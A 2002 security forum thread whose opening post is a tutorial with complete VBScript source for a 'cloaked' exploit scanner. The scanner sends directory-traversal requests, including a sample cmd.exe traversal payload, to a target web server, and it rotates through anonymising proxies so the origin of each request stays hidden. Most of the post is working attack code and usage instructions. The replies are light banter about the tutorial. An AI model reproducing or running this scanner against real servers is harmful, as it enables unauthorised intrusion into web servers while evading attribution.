-
July 17th, 2002, 04:53 PM
#1
Cloaked Exploit Scanner II
Overview
This is a continuation of my article on writing a Cloaked expliot scanner. In the first part we created a file called 'livehosts' containing a list of responding anonising proxy servers. In this article we will look at how to rotate through this file, connecting to a target server via a different proxy server for every request we make.
If you have not already read parts I - IV of this set of articles on the tcpUtil code please refer to these threads first before attempting the following:
Part I of this document
Scripting Internet Connections Under Window$
Search Engine submission 'exploit'
Google 'exploit' - TCPUtil pt III
The Exploit File
Requests that are to be passed through the proxy to a server a listed in the 'exploit' file. A sample exploit file is included in the zip file at the end of this article, but you could stuff this file with just about anything. The file contains requests URLs that the script will try and GET on the traget machine via a proxy.
For example, the format of a simple traversal exploit would be as follows.
/.%2e/.%2e/winnt/system32/cmd.exe?/c+dir+c:\
The script will try each request line in turn, cycling through the list of proxies in the live hosts file.
Usage
Usage: scan.vbs [--Target|-t] Ip address or hostname of target
[--exploitfile|-e] file name to read exploit list from
[--proxyfile|-p] file name to read live proxies list from
[--Delay|-d] Page Time Out delay (in seconds) Default: 1 Seconds
[--Verbose|-v]
[--debug|-vv]
[--Help|-?]
An example
The command above scans www.ntsa.org.uk using the file exploit as the list of requests and livehost as the list of live anonising proxy servers. The command produces the output below. Notice that each request is made via a different proxy server. The Server response is the return code from the server. If the return code is 200 (sucsessful) then you have (in the examples) found a traversal to the command line.
Registration of the sbwinsock control
You need to register the sbwinsock.ocx control provided in the zip file at the of this post. To register the OCX component run the following command:
regsvr32 <path_to_OCX>\<component_name>.OCX
The Code!
Code:
dim buffer,blncon,blnSkip,wtresp,secwait,blnLastcmdnull 'Program Vars
DIM blnbuff,blnifile,lang,sdelay,Verbose,debug,iFile,Ofile,str,Target,exploitfile,proxyfile 'User Vars
Dim oArgs, ArgNum 'Argument vars
Const sckTCPProtocol=0
Const sckUDPProtocol=1
const FlgDebug =1
const flgVerbose =2
const flgEcho =3
Const ForReading = 1
const ForWriting = 2
WScript.Echo "--Cloaked Traversal Scanner."
WScript.Echo "--July 2002 by NTSA."
WScript.Echo "--www.ntsa.org.uk"
WScript.Echo ""
'Create a FSO for file I/O operations
Set fso = CreateObject("Scripting.FileSystemObject")
'Create the winsock object and pass the event handler tp wsPop_
on error resume next
Set tcpClient=WScript.CreateObject("sbWinsck.winsock","wsPop_")
if err.number > 0 then
out "Could not create an instance of the SBWinsck control.",flgEcho
out "You need to register SBWinsck.ocx using the regsvr32",flgEcho
out "command. (ie regsvr32 c:\path\sbWinsck.ocx where c:\path",flgEcho
out "is the full path to the ocx file.",flgEcho
end if
GetUserParams
sp = split (proxylist,"|")
proxycount = cint(sp(0))
proxy = split(sp(1),",")
ex = split (ExploitList,"|")
Exploitcount = cint(ex(0))
Exploit = split(ex(1),",")
px = 0
for n = 0 to Exploitcount -1
sp = split(proxy(px),":")
host = sp(0)
port = sp(1)
str = "HEAD " & lcase("http://" & target & exploit(n)) & " HTTP/1.0"
out "exploit: " & STR,flgecho
out "Proxy: " & host,flgecho
out "Port: " & port,flgecho
tcpClient.Protocol = sckTCPProtocol
tcpClient.RemoteHost = host
tcpClient.RemotePort = port
tcpClient.Connect
tio = 0
do until blncon = true or blnskip = true or tio = sdelay *2
WSCRIPT.SLEEP 250
out "Waiting for connection...",FlgDebug
tio = tio + 1
LOOP
fail = false
'Timed out - Could not connect
if tio = sdelay *2 and blnskip =false then
out "Could not connect to: " & tcpClient.RemoteHost &_
" on port: " & tcpClient.RemotePort & ".",FlgEcho
fail = true
end if
if fail = false then
tio = 0
do until blncon = false or tio = sdelay *2
WSCRIPT.SLEEP 500
out "Waiting for disconnection...",FlgDebug
tio = tio + 1
loop
'Output buffer to screen
out "Server Response> " & mid(buffer,10,3), Flgecho
end if
blncon = false
blnskip = false
buffer = ""
tcpclient.disconnect
px = px + 1
if px > proxycount -1 then px = 0
Set tcpClient=nothing
Set tcpClient=WScript.CreateObject("sbWinsck.winsock","wsPop_")
next
function ProxyList
dim cnt
cnt = 0
Set livehosts = fso.OpenTextFile(proxyfile, ForReading)
do while trim(host) <> "."
host = livehosts.ReadLine
if len(trim(host)) > 0 and trim(host) <> "." then
proxylist = proxylist & trim(host) & ","
cnt = cnt + 1
end if
loop
proxylist = cstr(cnt) & "|" & left(proxylist,len(proxylist)-1)
end function
function ExploitList
dim cnt
cnt = 0
Set file = fso.OpenTextFile(exploitfile, ForReading)
do while trim(host) <> "."
host = file.ReadLine
if len(trim(host)) > 0 and trim(host) <> "." then
ExploitList = ExploitList & trim(host) & ","
cnt = cnt + 1
end if
loop
ExploitList = cstr(cnt) & "|" & left(ExploitList,len(ExploitList)-1)
end function
Sub wsPop_DataArrival(Byval b)
dim strdata
out "Data Arrival...",flgverbose
'/* Get the data and add it to the buffer...
'*/
tcpClient.GetData strData,vbstring
if blnbuff = true then
buffer = buffer & strdata
else
out strdata,Flgverbose
end if
'Data has just arrived - wait some
'more to see if anything further comes
secwait = 100
blnskip = true
end sub
Sub wsPop_Connected()
blncon = true
blnskip = true
out "Connected...",flgverbose
'sending data to the host
out "Sending data...",flgverbose
sendandlog str & vbcrlf
out "Data sent.",flgverbose
End Sub
sub sendandlog(data)
tcpclient.SendData data & vbCrLf
LogDataSend(data)
end sub
sub LogDataSend(poststr)
if port = 80 then
out "Sending:> " & poststr,Flgverbose
else
'out "Sending:> " & poststr,FlgEcho
end if
end sub
Sub wsPop_Close()
blncon = false
out "Disconnected...",flgverbose
End Sub
function RemoveDel(str)
RemoveDel = replace(str,"/","")
RemoveDel = replace(RemoveDel,"-","")
RemoveDel = replace(RemoveDel,"--","")
end function
function IsEmpty(str)
if str & "" = "" then
isempty = true
else
isempty = false
end if
end function
function iCount(str,del)
icount =0
for i = 1 to len(str)
if mid(str,i,1) = del then
icount = icount +1
end if
next
icount = icount - 1
end function
function input(quest)
WScript.StdOut.Write(quest & ":>")
input = WScript.StdIn.ReadLine()
end function
sub out(str,flg)
select case flg
case flgEcho
wscript.echo str
case flgVerbose
if verbose = true or debug = true then
wscript.echo str
end if
case FlgDebug
if debug = true then
wscript.echo str
end if
end select
end sub
sub GetUserParams
buffset = 0
Set oArgs = WScript.Arguments
ArgNum = 0
While ArgNum < oArgs.Count
Select Case RemoveDel(LCase(oArgs(ArgNum)))
Case "explotfile","e":
ArgNum = ArgNum + 1
If (fso.FileExists(oArgs(ArgNum))) Then
exploitfile = oArgs(ArgNum)
else
out "Error! The file " & oArgs(ArgNum) & _
" was not found.",FlgEcho
out "",FlgEcho
displayusage
wscript.quit(1)
end if
Case "proxyfile","p":
ArgNum = ArgNum + 1
If (fso.FileExists(oArgs(ArgNum))) Then
proxyfile = oArgs(ArgNum)
else
out "Error! The file " & oArgs(ArgNum) & _
" was not found.",FlgEcho
out "",FlgEcho
displayusage
wscript.quit(1)
end if
Case "target","t":
ArgNum = ArgNum + 1
Target = oArgs(ArgNum)
Case "delay","d":
ArgNum = ArgNum + 1
sdelay = oArgs(ArgNum)
Case "help","?":
Call DisplayUsage
Case "verbose", "v":
Verbose = true
Case "debug","vv":
debug = true
Case Else:
WScript.Echo "Unknown argument "& oArgs(ArgNum)
Call DisplayUsage
wscrip.quit(1)
End Select
ArgNum = ArgNum + 1
Wend
blnbuff = true
buffset = 1
if isempty(sdelay) then
'Set default as 1 second delay before breaking connection
sdelay = 1
end if
if isempty(target) or isempty(exploitfile) or isempty(proxyfile) then
'Set default as 3 second delay before breaking connection
out "A target host, a proxy file and exploit file are required.",flgecho
DisplayUsage
wscript.quit(1)
else
out "target> " & target,flgdebug
out "exploitfile> " & exploitfile,flgdebug
out "proxyfile> " & proxyfile,flgdebug
end if
end sub
Sub DisplayUsage
WScript.Echo "Usage: scan.vbs [--Target|-t]"
WScript.Echo " [--exploitfile|-e] file name to read exploit list from"
WScript.Echo " [--proxyfile|-p] file name to read live proxies list from"
WScript.Echo " [--Delay|-d] Page Time Out delay " & _
"(in seconds) Default: 1 Seconds"
WScript.Echo " [--Verbose|-v]"
WScript.Echo " [--debug|-vv]"
WScript.Echo " [--Help|/?]>"
WScript.Echo ""
WScript.Quit (1)
End Sub
If you enjoyed this thread you may enjoy these others:
Cloaked Exploit Scanner Part I and Part II
Google 'exploit' - TCPUtil pt III
Open Source FTP Control
Web based classes
Backing up the IIS metabase.
What port is that?
Building your own IDS tripwire.
Credit card security
Dumping SQL data to a text file
Hunting down skript kiddies
Search Engine submission 'exploit'
Forced shutdown of a remote nt/2k server
Securing an installation of IIS 4. (No, seriously)
Remote DSN Connections, using WinAPIs and the registry
Scripting Internet Connections Under Window$
\"I may not agree with what you say, but I will defend to the death your right to say it.\"
Sir Winston Churchill.
-
July 21st, 2002, 02:18 AM
#2
aRRRRRRRRRRRRGh, another tut!
thats too many, too soon and containing too much for me, i narrowly averted a buffer overflow when i saw this in the forum.
is this stuff is just bursting out of your head or what? can you not do something else to relieve the pressure? like knitting, its supposed to be relaxing. or at least just pretend to not know something and write a bad tut remember, some people out here like to think they have a good understanding of the machine!...thanks for making sure that more people actually do understand...me included, naturally.
.maX
Hmm...theres something a little peculiar here. Oh i see what it is! the sentence is talking about itself! do you see that? what do you mean? sentences can\'t talk! No, but they REFER to things, and this one refers directly-unambigeously-unmistakably-to the very sentence which it is!
-
July 21st, 2002, 11:07 AM
#3
rofl.
Knitting sounds fun - but I doubt I'd be allowed any sharp objects.
\"I may not agree with what you say, but I will defend to the death your right to say it.\"
Sir Winston Churchill.
-
July 21st, 2002, 04:00 PM
#4
man that is some poor internal documentation of code if I ever saw it, other than that good job.
Alternate realities celebrate reality. If you cant handle the reality your in, then you wont be able to handle the one your attempting to escape to.
Posting Permissions
- You may not post new threads
- You may not post replies
- You may not post attachments
- You may not edit your posts
-
Forum Rules
|
|